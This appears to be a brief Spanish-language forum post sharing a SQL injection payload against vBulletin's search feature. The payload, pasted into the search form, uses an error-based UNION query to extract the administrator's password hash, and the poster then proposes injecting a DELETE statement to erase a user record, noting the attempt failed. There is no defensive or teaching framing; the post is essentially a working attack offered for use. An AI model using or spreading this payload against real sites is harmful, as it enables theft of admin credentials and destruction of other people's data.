Código
&searchfromtype=vBForum:SocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) UNION SELECT password FROM USER WHERE userid=1 AND ROW(1,1)>(SELECT COUNT(*),concat( (SELECT USER.password) ,0x3a,FLOOR(rand(0)*2)) x FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)a GROUP BY x LIMIT 1) -- /*);
Eso se agrega en el formulario de busqueda.
Estaria bueno enviar una orden para borrar cierto registro tipo:
Código
mysql_query(DELETE FROM USER WHERE userid=408);
Probe sin resultados.